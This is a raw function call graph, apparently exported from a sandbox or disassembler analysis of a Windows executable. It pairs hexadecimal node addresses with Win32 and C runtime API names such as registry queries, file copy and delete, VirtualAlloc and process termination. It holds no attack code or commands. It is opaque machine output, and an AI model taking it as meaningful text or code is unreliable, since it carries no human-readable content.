calls 96456->96457 96458 db30fe __fread_nolock 96457->96458 96460 d763b6 __fread_nolock 96459->96460 96461 d76382 96459->96461 96460->96446 96461->96460 96462 db4a82 96461->96462 96463 d763a9 96461->96463 96465 d8fddb 22 API calls 96462->96465 96470 d7a587 96463->96470 96466 db4a91 96465->96466 96467 d8fe0b 22 API calls 96466->96467 96468 db4ac5 __fread_nolock 96467->96468 96469->96447 96471 d7a59d 96470->96471 96474 d7a598 __fread_nolock 96470->96474 96472 dbf80f 96471->96472 96473 d8fe0b 22 API calls 96471->96473 96473->96474 96474->96460 96476 d733fe _wcslen 96475->96476 96477 db311d 96476->96477 96478 d73411 96476->96478 96480 d8fddb 22 API calls 96477->96480 96479 d7a587 22 API calls 96478->96479 96481 d7341e __fread_nolock 96479->96481 96482 db3127 96480->96482 96481->96455 96483 d8fe0b 22 API calls 96482->96483 96484 db3157 __fread_nolock 96483->96484 96485 d903fb 96486 d90407 ___BuildCatchObject 96485->96486 96514 d8feb1 96486->96514 96488 d9040e 96489 d90561 96488->96489 96492 d90438 96488->96492 96541 d9083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96489->96541 96491 d90568 96542 d94e52 28 API calls _abort 96491->96542 96503 d90477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96492->96503 96525 da247d 96492->96525 96494 d9056e 96543 d94e04 28 API calls _abort 96494->96543 96498 d90576 96499 d90457 96501 d904d8 96533 d90959 96501->96533 96503->96501 96537 d94e1a 38 API calls 2 library calls 96503->96537 96505 d904de 96506 d904f3 96505->96506 96538 d90992 GetModuleHandleW 96506->96538 96508 d904fa 96508->96491 96509 d904fe 96508->96509 96510 d90507 96509->96510 96539 d94df5 28 API calls _abort 96509->96539 96540 d90040 13 API calls 2 library calls 96510->96540 96513 d9050f 96513->96499 96515 d8feba 96514->96515 96544 d90698 IsProcessorFeaturePresent 96515->96544 96517 d8fec6 96545 d92c94 10 API calls 3 library calls 96517->96545 96519 d8fecb 96520 d8fecf 96519->96520 96546 da2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96519->96546 96520->96488 96522 d8fed8 96523 d8fee6 96522->96523 96547 d92cbd 8 API calls 3 library calls 96522->96547 96523->96488 96527 da2494 96525->96527 96526 d90a8c CatchGuardHandler 5 API calls 96528 d90451 96526->96528 96527->96526 96528->96499 96529 da2421 96528->96529 96530 da2450 96529->96530 96531 d90a8c CatchGuardHandler 5 API calls 96530->96531 96532 da2479 96531->96532 96532->96503 96548 d92340 96533->96548 96536 d9097f 96536->96505 96537->96501 96538->96508 96539->96510 96540->96513 96541->96491 96542->96494 96543->96498 96544->96517 96545->96519 96546->96522 96547->96520 96549 d9096c GetStartupInfoW 96548->96549 96549->96536 96550 d7fe73 96557 d8ceb1 96550->96557 96552 d7fe89 96566 d8cf92 96552->96566 96554 d7feb3 96578 de359c 82 API calls __wsopen_s 96554->96578 96556 dc4ab8 96558 d8cebf 96557->96558 96559 d8ced2 96557->96559 96579 d7aceb 23 API calls messages 96558->96579 96561 d8cf05 96559->96561 96562 d8ced7 96559->96562 96580 d7aceb 23 API calls messages 96561->96580 96563 d8fddb 22 API calls 96562->96563 96565 d8cec9 96563->96565 96565->96552 96567 d76270 22 API calls 96566->96567 96568 d8cfc9 96567->96568 96569 d79cb3 22 API calls 96568->96569 96572 d8cffa 96568->96572 96570 dcd166 96569->96570 96571 d76350 22 API calls 96570->96571 96573 dcd171 96571->96573 96572->96554 96581 d8d2f0 40 API calls 96573->96581 96575 dcd184 96577 dcd188 96575->96577 96582 d7aceb 23 API calls messages 96575->96582 96577->96577 96578->96556 96579->96565 96580->96565 96581->96575 96582->96577 96583 d71033 96588 d74c91 96583->96588 96587 d71042 96589 d7a961 22 API calls 96588->96589 96590 d74cff 96589->96590 96596 d73af0 96590->96596 96593 d74d9c 96594 d71038 96593->96594 96599 d751f7 22 API calls __fread_nolock 96593->96599 96595 d900a3 29 API calls __onexit 96594->96595 96595->96587 96600 d73b1c 96596->96600 96599->96593 96601 d73b29 96600->96601 96602 d73b0f 96600->96602 96601->96602 96603 d73b30 RegOpenKeyExW 96601->96603 96602->96593 96603->96602 96604 d73b4a RegQueryValueExW 96603->96604 96605 d73b80 RegCloseKey 96604->96605 96606 d73b6b 96604->96606 96605->96602 96606->96605 96607 d7f7bf 96608 d7fcb6 96607->96608 96609 d7f7d3 96607->96609 96701 d7aceb 23 API calls messages 96608->96701 96610 d7fcc2 96609->96610 96612 d8fddb 22 API calls 96609->96612 96702 d7aceb 23 API calls messages 96610->96702 96614 d7f7e5 96612->96614 96614->96610 96615 d7f83e 96614->96615 96616 d7fd3d 96614->96616 96632 d7ed9d messages 96615->96632 96642 d81310 96615->96642 96703 de1155 22 API calls 96616->96703 96619 d8fddb 22 API calls 96640 d7ec76 messages 96619->96640 96620 d7fef7 96627 d7a8c7 22 API calls 96620->96627 96620->96632 96623 dc4600 96629 d7a8c7 22 API calls 96623->96629 96623->96632 96624 dc4b0b 96705 de359c 82 API calls __wsopen_s 96624->96705 96625 d7a8c7 22 API calls 96625->96640 96627->96632 96629->96632 96631 d7fbe3 96631->96632 96634 dc4bdc 96631->96634 96641 d7f3ae messages 96631->96641 96633 d7a961 22 API calls 96633->96640 96706 de359c 82 API calls __wsopen_s 96634->96706 96636 d900a3 29 API calls pre_c_initialization 96636->96640 96637 d90242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96637->96640 96638 dc4beb 96707 de359c 82 API calls __wsopen_s 96638->96707 96639 d901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96639->96640 96640->96619 96640->96620 96640->96623 96640->96624 96640->96625 96640->96631 96640->96632 96640->96633 96640->96636 96640->96637 96640->96638 96640->96639 96640->96641 96699 d801e0 235 API calls 2 library calls 96640->96699 96700 d806a0 41 API calls messages 96640->96700 96641->96632 96704 de359c 82 API calls __wsopen_s 96641->96704 96643 d817b0 96642->96643 96644 d81376 96642->96644 96841 d90242 5 API calls __Init_thread_wait 96643->96841 96645 d81390 96644->96645 96646 dc6331 96644->96646 96708 d81940 96645->96708 96649 dc633d 96646->96649 96846 df709c 235 API calls 96646->96846 96649->96640 96651 d817ba 96653 d817fb 96651->96653 96655 d79cb3 22 API calls 96651->96655 96657 dc6346 96653->96657 96659 d8182c 96653->96659 96654 d81940 9 API calls 96656 d813b6 96654->96656 96662 d817d4 96655->96662 96656->96653 96658 d813ec 96656->96658 96847 de359c 82 API calls __wsopen_s 96657->96847 96658->96657 96665 d81408 __fread_nolock 96658->96665 96843 d7aceb 23 API calls messages 96659->96843 96842 d901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96662->96842 96663 d81839 96844 d8d217 235 API calls 96663->96844 96665->96663 96667 dc636e 96665->96667 96675 d8fddb 22 API calls 96665->96675 96676 d8fe0b 22 API calls 96665->96676 96682 d8152f 96665->96682 96683 dc63b2 96665->96683 96686 dc6369 96665->96686 96718 d7ec40 96665->96718 96848 de359c 82 API calls __wsopen_s 96667->96848 96668 d81872 96845 d8faeb 23 API calls 96668->96845 96670 d8153c 96673 d81940 9 API calls 96670->96673 96671 dc63d1 96850 df5745 54 API calls _wcslen 96671->96850 96674 d81549 96673->96674 96678 d81940 9 API calls 96674->96678 96679 dc64fa 96674->96679 96675->96665 96676->96665 96685 d81563 96678->96685 96679->96686 96851 de359c 82 API calls __wsopen_s 96679->96851 96682->96670 96682->96671 96849 de359c 82 API calls __wsopen_s 96683->96849 96685->96679 96687 d7a8c7 22 API calls 96685->96687 96689 d815c7 messages 96685->96689 96686->96640 96687->96689 96688 d81940 9 API calls 96688->96689 96689->96668 96689->96679 96689->96686 96689->96688 96691 d8167b messages 96689->96691 96697 d74f39 68 API calls 96689->96697 96742 df959f 96689->96742 96745 df958b 96689->96745 96748 ddd4ce 96689->96748 96751 def0ec 96689->96751 96760 de6ef1 96689->96760 96690 d8171d 96690->96640 96691->96690 96840 d8ce17 22 API calls messages 96691->96840 96697->96689 96699->96640 96700->96640 96701->96610 96702->96616 96703->96632 96704->96632 96705->96632 96706->96638 96707->96632 96709 d8195d 96708->96709 96710 d81981 96708->96710 96717 d813a0 96709->96717 96854 d90242 5 API calls __Init_thread_wait 96709->96854 96852 d90242 5 API calls __Init_thread_wait 96710->96852 96713 d8198b 96713->96709 96853 d901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96713->96853 96714 d88727 96714->96717 96855 d901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96714->96855 96717->96654 96736 d7ec76 messages 96718->96736 96719 d90242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96719->96736 96720 d900a3 29 API calls pre_c_initialization 96720->96736 96721 d7fef7 96729 d7a8c7 22 API calls 96721->96729 96735 d7ed9d messages 96721->96735 96724 d8fddb 22 API calls 96724->96736 96725 dc4600 96731 d7a8c7 22 API calls 96725->96731 96725->96735 96726 dc4b0b 96859 de359c 82 API calls __wsopen_s 96726->96859 96727 d7a8c7 22 API calls 96727->96736 96729->96735 96731->96735 96733 d7fbe3 96733->96735 96737 dc4bdc 96733->96737 96741 d7f3ae messages 96733->96741 96734 d7a961 22 API calls 96734->96736 96735->96665 96736->96719 96736->96720 96736->96721 96736->96724 96736->96725 96736->96726 96736->96727 96736->96733 96736->96734 96736->96735 96739 dc4beb 96736->96739 96740 d901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96736->96740 96736->96741 96856 d801e0 235 API calls 2 library calls 96736->96856 96857 d806a0 41 API calls messages 96736->96857 96860 de359c 82 API calls __wsopen_s 96737->96860 96861 de359c 82 API calls __wsopen_s 96739->96861 96740->96736 96741->96735 96858 de359c 82 API calls __wsopen_s 96741->96858 96862 df7f59 96742->96862 96744 df95af 96744->96689 96746 df7f59 120 API calls 96745->96746 96747 df959b 96746->96747 96747->96689 96995 dddbbe lstrlenW 96748->96995 96752 d77510 53 API calls 96751->96752 96753 def126 96752->96753 97000 d79e90 96753->97000 96755 def136 96756 def15b 96755->96756 96757 d7ec40 235 API calls 96755->96757 96759 def15f 96756->96759 97028 d79c6e 22 API calls 96756->97028 96757->96756 96759->96689 96761 d7a961 22 API calls 96760->96761 96762 de6f1d 96761->96762 96763 d7a961 22 API calls 96762->96763 96764 de6f26 96763->96764 96765 de6f3a 96764->96765 97195 d7b567 39 API calls 96764->97195 96767 d77510 53 API calls 96765->96767 96768 de6f57 _wcslen 96767->96768 96769 de70bf 96768->96769 96770 de6fbc 96768->96770 96839 de70e9 96768->96839 96771 d74ecb 94 API calls 96769->96771 96772 d77510 53 API calls 96770->96772 96773 de70d0 96771->96773 96774 de6fc8 96772->96774 96775 de70e5 96773->96775 96776 d74ecb 94 API calls 96773->96776 96778 d7a8c7 22 API calls 96774->96778 96780 de6fdb 96774->96780 96777 d7a961 22 API calls 96775->96777 96775->96839 96776->96775 96779 de711a 96777->96779 96778->96780 96782 d7a961 22 API calls 96779->96782 96781 de7027 96780->96781 96783 de7005 96780->96783 96787 d7a8c7 22 API calls 96780->96787 96784 d77510 53 API calls 96781->96784 96785 de7126 96782->96785 96788 d733c6 22 API calls 96783->96788 96789 de7034 96784->96789 96786 d7a961 22 API calls 96785->96786 96790 de712f 96786->96790 96787->96783 96791 de700f 96788->96791 96792 de703d 96789->96792 96793 de7047 96789->96793 96795 d7a961 22 API calls 96790->96795 96796 d77510 53 API calls 96791->96796 96797 d7a8c7 22 API calls 96792->96797 97196 dde199 GetFileAttributesW 96793->97196 96799 de7138 96795->96799 96800 de701b 96796->96800 96797->96793 96798 de7050 96801 de7063 96798->96801 96804 d74c6d 22 API calls 96798->96804 96802 d77510 53 API calls 96799->96802 96803 d76350 22 API calls 96800->96803 96806 d77510 53 API calls 96801->96806 96812 de7069 96801->96812 96805 de7145 96802->96805 96803->96781 96804->96801 97044 d7525f 96805->97044 96808 de70a0 96806->96808 97197 ddd076 57 API calls 96808->97197 96809 de7166 96811 d74c6d 22 API calls 96809->96811 96813 de7175 96811->96813 96812->96839 96814 de71a9 96813->96814 96816 d74c6d 22 API calls 96813->96816 96815 d7a8c7 22 API calls 96814->96815 96817 de71ba 96815->96817 96818 de7186 96816->96818 96819 d76350 22 API calls 96817->96819 96818->96814 96821 d76b57 22 API calls 96818->96821 96820 de71c8 96819->96820 96822 d76350 22 API calls 96820->96822 96823 de719b 96821->96823 96825 de71d6 96822->96825 96824 d76b57 22 API calls 96823->96824 96824->96814 96826 d76350 22 API calls 96825->96826 96827 de71e4 96826->96827 96828 d77510 53 API calls 96827->96828 96829 de71f0 96828->96829 97086 ddd7bc 96829->97086 96831 de7201 96832 ddd4ce 4 API calls 96831->96832 96833 de720b 96832->96833 96834 d77510 53 API calls 96833->96834 96838 de7239 96833->96838 96835 de7229 96834->96835 97140 de2947 96835->97140 96837 d74f39 68 API calls 96837->96839 96838->96837 96839->96689 96840->96691 96841->96651 96842->96653 96843->96663 96844->96668 96845->96668 96846->96649 96847->96686 96848->96686 96849->96686 96850->96685 96851->96686 96852->96713 96853->96709 96854->96714 96855->96717 96856->96736 96857->96736 96858->96735 96859->96735 96860->96739 96861->96735 96900 d77510 96862->96900 96866 df7fd5 messages 96866->96744 96867 df844f 96964 df8ee4 60 API calls 96867->96964 96869 df828f 96936 df7e86 96869->96936 96871 df845e 96871->96869 96872 df846a 96871->96872 96872->96866 96873 d77510 53 API calls 96890 df8049 96873->96890 96878 df82c8 96951 d8fc70 96878->96951 96881 df82e8 96957 de359c 82 API calls __wsopen_s 96881->96957 96882 df8302 96958 d763eb 22 API calls 96882->96958 96885 df82f3 GetCurrentProcess TerminateProcess 96885->96882 96886 df8281 96886->96867 96886->96869 96887 df8311 96959 d76a50 22 API calls 96887->96959 96889 df832a 96898 df8352 96889->96898 96960 d804f0 22 API calls 96889->96960 96890->96866 96890->96873 96890->96886 96955 dd417d 22 API calls __fread_nolock 96890->96955 96956 df851d 42 API calls _strftime 96890->96956 96891 df84c5 96891->96866 96895 df84d9 FreeLibrary 96891->96895 96893 df8341 96961 df8b7b 75 API calls 96893->96961 96895->96866 96898->96891 96962 d804f0 22 API calls 96898->96962 96963 d7aceb 23 API calls messages 96898->96963 96965 df8b7b 75 API calls 96898->96965 96901 d77525 96900->96901 96916 d77522 96900->96916 96902 d7752d 96901->96902 96903 d7755b 96901->96903 96966 d951c6 26 API calls 96902->96966 96906 db500f 96903->96906 96907 d7756d 96903->96907 96914 db50f6 96903->96914 96917 d8fe0b 22 API calls 96906->96917 96918 db5088 96906->96918 96967 d8fb21 51 API calls 96907->96967 96908 d7753d 96912 d8fddb 22 API calls 96908->96912 96909 db510e 96909->96909 96913 d77547 96912->96913 96915 d79cb3 22 API calls 96913->96915 96969 d95183 26 API calls 96914->96969 96915->96916 96916->96866 96923 df8cd3 96916->96923 96919 db5058 96917->96919 96968 d8fb21 51 API calls 96918->96968 96920 d8fddb 22 API calls 96919->96920 96921 db507f 96920->96921 96922 d79cb3 22 API calls 96921->96922 96922->96918 96924 d7aec9 22 API calls 96923->96924 96925 df8cee CharLowerBuffW 96924->96925 96970 dd8e54 96925->96970 96929 d7a961 22 API calls 96930 df8d2a 96929->96930 96977 d76d25 96930->96977 96932 df8d3e 96933 d793b2 22 API calls 96932->96933 96935 df8d48 _wcslen 96933->96935 96934 df8e5e _wcslen 96934->96890 96935->96934 96990 df851d 42 API calls _strftime 96935->96990 96937 df7ea1 96936->96937 96941 df7eec 96936->96941 96938 d8fe0b 22 API calls 96937->96938 96939 df7ec3 96938->96939 96940 d8fddb 22 API calls 96939->96940 96939->96941 96940->96939 96942 df9096 96941->96942 96943 df92ab messages 96942->96943 96947 df90ba _strcat _wcslen 96942->96947 96943->96878 96944 d7b38f 39 API calls 96944->96947 96945 d7b567 39 API calls 96945->96947 96946 d7b6b5 39 API calls 96946->96947 96947->96943 96947->96944 96947->96945 96947->96946 96948 d77510 53 API calls 96947->96948 96949 d9ea0c 21 API calls ___std_exception_copy 96947->96949 96994 ddefae 24 API calls _wcslen 96947->96994 96948->96947 96949->96947 96953 d8fc85 96951->96953 96952 d8fd1d VirtualAlloc 96954 d8fceb 96952->96954 96953->96952 96953->96954 96954->96881 96954->96882 96955->96890 96956->96890 96957->96885 96958->96887 96959->96889 96960->96893 96961->96898 96962->96898 96963->96898 96964->96871 96965->96898 96966->96908 96967->96908 96968->96914 96969->96909 96971 dd8e74 _wcslen 96970->96971 96972 dd8f63 96971->96972 96973 dd8ea9 96971->96973 96975 dd8f68 96971->96975 96972->96929 96972->96935 96973->96972 96991 d8ce60 41 API calls 96973->96991 96975->96972 96992 d8ce60 41 API calls 96975->96992 96978 d76d34 96977->96978 96979 d76d91 96977->96979 96978->96979 96981 d76d3f 96978->96981 96980 d793b2 22 API calls 96979->96980 96982 d76d62 __fread_nolock 96980->96982 96983 db4c9d 96981->96983 96984 d76d5a 96981->96984 96982->96932 96985 d8fddb 22 API calls 96983->96985 96993 d76f34 22 API calls 96984->96993 96987 db4ca7 96985->96987 96988 d8fe0b 22 API calls 96987->96988 96989 db4cda 96988->96989 96990->96934 96991->96973 96992->96975 96993->96982 96994->96947 96996 dddbdc GetFileAttributesW 96995->96996 96997 ddd4d5 96995->96997 96996->96997 96998 dddbe8 FindFirstFileW 96996->96998 96997->96689 96998->96997 96999 dddbf9 FindClose 96998->96999 96999->96997 97001 d76270 22 API calls 97000->97001 97012 d79eb5 97001->97012 97002 d79fd2 97030 d7a4a1 97002->97030 97004 d79fec 97004->96755 97007 dbf7c4 97042 dd96e2 84 API calls __wsopen_s 97007->97042 97008 dbf699 97016 d8fddb 22 API calls 97008->97016 97009 d7a12c __fread_nolock 97009->97007 97010 d7a405 97009->97010 97010->97004 97043 dd96e2 84 API calls __wsopen_s 97010->97043 97012->97002 97012->97007 97012->97008 97012->97009 97012->97010 97015 d7a6c3 22 API calls 97012->97015 97023 d7a587 22 API calls 97012->97023 97024 d7aec9 22 API calls 97012->97024 97025 d7a4a1 22 API calls 97012->97025 97029 d74573 41 API calls _wcslen 97012->97029 97039 d748c8 23 API calls 97012->97039 97040 d749bd 22 API calls __fread_nolock 97012->97040 97041 d7a673 22 API calls 97012->97041 97015->97012 97018 dbf754 97016->97018 97017 dbf7d2 97019 d7a4a1 22 API calls 97017->97019 97021 d8fe0b 22 API calls 97018->97021 97020 dbf7e8 97019->97020 97020->97004 97021->97009 97023->97012 97026 d7a0db CharUpperBuffW 97024->97026 97025->97012 97038 d7a673 22 API calls 97026->97038 97028->96759 97029->97012 97031 d7a52b 97030->97031 97035 d7a4b1 __fread_nolock 97030->97035 97034 d8fe0b 22 API calls 97031->97034 97032 d8fddb 22 API calls 97033 d7a4b8 97032->97033 97036 d8fddb 22 API calls 97033->97036 97037 d7a4d6 97033->97037 97034->97035 97035->97032 97036->97037 97037->97004 97038->97012 97039->97012 97040->97012 97041->97012 97042->97017 97043->97004 97045 d7a961 22 API calls 97044->97045 97046 d75275 97045->97046 97047 d7a961 22 API calls 97046->97047 97048 d7527d 97047->97048 97049 d7a961 22 API calls 97048->97049 97050 d75285 97049->97050 97051 d7a961 22 API calls 97050->97051 97052 d7528d 97051->97052 97053 d752c1 97052->97053 97054 db3df5 97052->97054 97056 d76d25 22 API calls 97053->97056 97055 d7a8c7 22 API calls 97054->97055 97057 db3dfe 97055->97057 97058 d752cf 97056->97058 97059 d7a6c3 22 API calls 97057->97059 97060 d793b2 22 API calls 97058->97060 97062 d75304 97059->97062 97061 d752d9 97060->97061 97061->97062 97063 d76d25 22 API calls 97061->97063 97064 d75349 97062->97064 97065 d75325 97062->97065 97081 db3e20 97062->97081 97067 d752fa 97063->97067 97066 d76d25 22 API calls 97064->97066 97065->97064 97070 d74c6d 22 API calls 97065->97070 97068 d7535a 97066->97068 97069 d793b2 22 API calls 97067->97069 97071 d75370 97068->97071 97076 d7a8c7 22 API calls 97068->97076 97069->97062 97072 d75332 97070->97072 97074 d75384 97071->97074 97077 d7a8c7 22 API calls 97071->97077 97072->97064 97078 d76d25 22 API calls 97072->97078 97073 d76b57 22 API calls 97083 db3ee0 97073->97083 97075 d7538f 97074->97075 97079 d7a8c7 22 API calls 97074->97079 97080 d7a8c7 22 API calls 97075->97080 97085 d7539a 97075->97085 97076->97071 97077->97074 97078->97064 97079->97075 97080->97085 97081->97073 97082 d74c6d 22 API calls 97082->97083 97083->97064 97083->97082 97198 d749bd 22 API calls __fread_nolock 97083->97198 97085->96809 97087 ddd7d8 97086->97087 97088 ddd7dd 97087->97088 97089 ddd7f3 97087->97089 97090 ddd7ee 97088->97090 97092 d7a8c7 22 API calls 97088->97092 97091 d7a961 22 API calls 97089->97091 97090->96831 97093 ddd7fb 97091->97093 97092->97090 97094 d7a961 22 API calls 97093->97094 97095 ddd803 97094->97095 97096 d7a961 22 API calls 97095->97096 97097 ddd80e 97096->97097 97098 d7a961 22 API calls 97097->97098 97099 ddd816 97098->97099 97100 d7a961 22 API calls 97099->97100 97101 ddd81e 97100->97101 97102 d7a961 22 API calls 97101->97102 97103 ddd826 97102->97103 97104 d7a961 22 API calls 97103->97104 97105 ddd82e 97104->97105 97106 d7a961 22 API calls 97105->97106 97107 ddd836 97106->97107 97108 d7525f 22 API calls 97107->97108 97109 ddd84d 97108->97109 97110 d7525f 22 API calls 97109->97110 97111 ddd866 97110->97111 97112 d74c6d 22 API calls 97111->97112 97113 ddd872 97112->97113 97114 ddd885 97113->97114 97116 d793b2 22 API calls 97113->97116 97115 d74c6d 22 API calls 97114->97115 97117 ddd88e 97115->97117 97116->97114 97118 ddd89e 97117->97118 97119 d793b2 22 API calls 97117->97119 97120 ddd8b0 97118->97120 97121 d7a8c7 22 API calls 97118->97121 97119->97118 97122 d76350 22 API calls 97120->97122 97121->97120 97123 ddd8bb 97122->97123 97199 ddd978 22 API calls 97123->97199 97125 ddd8ca 97200 ddd978 22 API calls 97125->97200 97127 ddd8dd 97128 d74c6d 22 API calls 97127->97128 97129 ddd8e7 97128->97129 97130 ddd8ec 97129->97130 97131 ddd8fe 97129->97131 97132 d733c6 22 API calls 97130->97132 97133 d74c6d 22 API calls 97131->97133 97134 ddd8f9 97132->97134 97135 ddd907 97133->97135 97138 d76350 22 API calls 97134->97138 97136 ddd925 97135->97136 97137 d733c6 22 API calls 97135->97137 97139 d76350 22 API calls 97136->97139 97137->97134 97138->97136 97139->97090 97141 de2954 __wsopen_s 97140->97141 97142 d8fe0b 22 API calls 97141->97142 97143 de2971 97142->97143 97144 d75722 22 API calls 97143->97144 97145 de297b 97144->97145 97146 de274e 27 API calls 97145->97146 97147 de2986 97146->97147 97148 d7511f 64 API calls 97147->97148 97149 de299b 97148->97149 97150 de29bf 97149->97150 97151 de2a6c 97149->97151 97152 de2e66 75 API calls 97150->97152 97153 de2e66 75 API calls 97151->97153 97154 de29c4 97152->97154 97168 de2a38 97153->97168 97159 de2a75 messages 97154->97159 97205 d9d583 26 API calls 97154->97205 97156 d750f5 40 API calls 97157 de2a91 97156->97157 97158 d750f5 40 API calls 97157->97158 97161 de2aa1 97158->97161 97159->96838 97160 de29ed 97206 d9d583 26 API calls 97160->97206 97162 d750f5 40 API calls 97161->97162 97164 de2abc 97162->97164 97165 d750f5 40 API calls 97164->97165 97166 de2acc 97165->97166 97167 d750f5 40 API calls 97166->97167 97169 de2ae7 97167->97169 97168->97156 97168->97159 97170 d750f5 40 API calls 97169->97170 97171 de2af7 97170->97171 97172 d750f5 40 API calls 97171->97172 97173 de2b07 97172->97173 97174 d750f5 40 API calls 97173->97174 97175 de2b17 97174->97175 97201 de3017 GetTempPathW GetTempFileNameW 97175->97201 97177 de2b22 97178 d9e5eb 29 API calls 97177->97178 97179 de2b33 97178->97179 97179->97159 97182 d750f5 40 API calls 97179->97182 97189 d9dbb3 65 API calls 97179->97189 97191 de2bed 97179->97191 97180 d9e678 67 API calls 97181 de2bf8 97180->97181 97183 de2bfe DeleteFileW 97181->97183 97184 de2c12 97181->97184 97182->97179 97183->97159 97185 de2c91 CopyFileW 97184->97185 97190 de2c18 97184->97190 97186 de2cb9 DeleteFileW 97185->97186 97187 de2ca7 DeleteFileW 97185->97187 97202 de2fd8 CreateFileW 97186->97202 97187->97159 97189->97179 97192 de22ce 79 API calls 97190->97192 97191->97180 97193 de2c7c 97192->97193 97193->97186 97194 de2c80 DeleteFileW 97193->97194 97194->97159 97195->96765 97196->96798 97197->96812 97198->97083 97199->97125 97200->97127 97201->97177 97203 de2fff SetFileTime CloseHandle 97202->97203 97204 de3013 97202->97204 97203->97204 97204->97159 97205->97160 97206->97168 97207 d7dddc 97210 d7b710 97207->97210 97211 d7b72b 97210->97211 97212 dc00f8 97211->97212 97213 dc0146 97211->97213 97221 d7b750 97211->97221 97216 dc0102 97212->97216 97219 dc010f 97212->97219 97212->97221 97252 df58a2 235 API calls 2 library calls 97213->97252 97250 df5d33 235 API calls 97216->97250 97237 d7ba20 97219->97237 97251 df61d0 235 API calls 2 library calls 97219->97251 97223 d7bbe0 40 API calls 97221->97223 97227 d8d336 40 API calls 97221->97227 97228 d7ba4e 97221->97228 97230 dc0322 97221->97230 97221->97237 97238 d7ec40 235 API calls 97221->97238 97239 d7a8c7 22 API calls 97221->97239 97241 d7a81b 41 API calls 97221->97241 97242 d8d2f0 40 API calls 97221->97242 97243 d8a01b 235 API calls 97221->97243 97244 d90242 5 API calls __Init_thread_wait 97221->97244 97245 d8edcd 22 API calls 97221->97245 97246 d900a3 29 API calls __onexit 97221->97246 97247 d901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97221->97247 97248 d8ee53 82 API calls 97221->97248 97249 d8e5ca 235 API calls 97221->97249 97253 d7aceb 23 API calls messages 97221->97253 97254 dcf6bf 23 API calls 97221->97254 97223->97221 97224 dc03d9 97224->97224 97227->97221 97255 df5c0c 82 API calls 97230->97255 97237->97228 97256 de359c 82 API calls __wsopen_s 97237->97256 97238->97221 97239->97221 97241->97221 97242->97221 97243->97221 97244->97221 97245->97221 97246->97221 97247->97221 97248->97221 97249->97221 97250->97219 97251->97237 97252->97221 97253->97221 97254->97221 97255->97237 97256->97224 97257 d7105b 97262 d7344d 97257->97262 97259 d7106a 97293 d900a3 29 API calls __onexit 97259->97293 97261 d71074 97263 d7345d __wsopen_s 97262->97263 97264 d7a961 22 API calls 97263->97264 97265 d73513 97264->97265 97266 d73a5a 24 API calls 97265->97266 97267 d7351c 97266->97267 97294 d73357 97267->97294 97270 d733c6 22 API calls 97271 d73535 97270->97271 97272 d7515f 22 API calls 97271->97272 97273 d73544 97272->97273 97274 d7a961 22 API calls 97273->97274 97275 d7354d 97274->97275 97276 d7a6c3 22 API calls 97275->97276 97277 d73556 RegOpenKeyExW 97276->97277 97278 db3176 RegQueryValueExW 97277->97278 97282 d73578 97277->97282 97279 db320c RegCloseKey 97278->97279 97280 db3193 97278->97280 97279->97282 97292 db321e _wcslen 97279->97292 97281 d8fe0b 22 API calls 97280->97281 97283 db31ac 97281->97283 97282->97259 97285 d75722 22 API calls 97283->97285 97284 d74c6d 22 API calls 97284->97292 97286 db31b7 RegQueryValueExW 97285->97286 97287 db31d4 97286->97287 97289 db31ee messages 97286->97289 97288 d76b57 22 API calls 97287->97288 97288->97289 97289->97279 97290 d79cb3 22 API calls 97290->97292 97291 d7515f 22 API calls 97291->97292 97292->97282 97292->97284 97292->97290 97292->97291 97293->97261 97295 db1f50 __wsopen_s 97294->97295 97296 d73364 GetFullPathNameW 97295->97296 97297 d73386 97296->97297 97298 d76b57 22 API calls 97297->97298 97299 d733a4 97298->97299 97299->97270 97300 d71098 97305 d742de 97300->97305 97304 d710a7 97306 d7a961 22 API calls 97305->97306 97307 d742f5 GetVersionExW 97306->97307 97308 d76b57 22 API calls 97307->97308 97309 d74342 97308->97309 97310 d793b2 22 API calls 97309->97310 97320 d74378 97309->97320 97311 d7436c 97310->97311 97313 d737a0 22 API calls 97311->97313 97312 d7441b GetCurrentProcess IsWow64Process 97314 d74437 97312->97314 97313->97320 97315 d7444f LoadLibraryA 97314->97315 97316 db3824 GetSystemInfo 97314->97316 97317 d74460 GetProcAddress 97315->97317 97318 d7449c GetSystemInfo 97315->97318 97317->97318 97322 d74470 GetNativeSystemInfo 97317->97322 97319 d74476 97318->97319 97323 d7109d 97319->97323 97324 d7447a FreeLibrary 97319->97324 97320->97312 97321 db37df 97320->97321 97322->97319 97325 d900a3 29 API calls __onexit 97323->97325 97324->97323 97325->97304 97326 d71044 97331 d710f3 97326->97331 97328 d7104a 97367 d900a3 29 API calls __onexit 97328->97367 97330 d71054 97368 d71398 97331->97368 97335 d7116a 97336 d7a961 22 API calls 97335->97336 97337 d71174 97336->97337 97338 d7a961 22 API calls 97337->97338 97339 d7117e 97338->97339 97340 d7a961 22 API calls 97339->97340 97341 d71188 97340->97341 97342 d7a961 22 API calls 97341->97342 97343 d711c6 97342->97343 97344 d7a961 22 API calls 97343->97344 97345 d71292 97344->97345 97378 d7171c 97345->97378 97349 d712c4 97350 d7a961 22 API calls 97349->97350 97351 d712ce 97350->97351 97352 d81940 9 API calls 97351->97352 97353 d712f9 97352->97353 97399 d71aab 97353->97399 97355 d71315 97356 d71325 GetStdHandle 97355->97356 97357 d7137a 97356->97357 97358 db2485 97356->97358 97361 d71387 OleInitialize 97357->97361 97358->97357 97359 db248e 97358->97359 97360 d8fddb 22 API calls 97359->97360 97362 db2495 97360->97362 97361->97328 97406 de011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97362->97406 97364 db249e 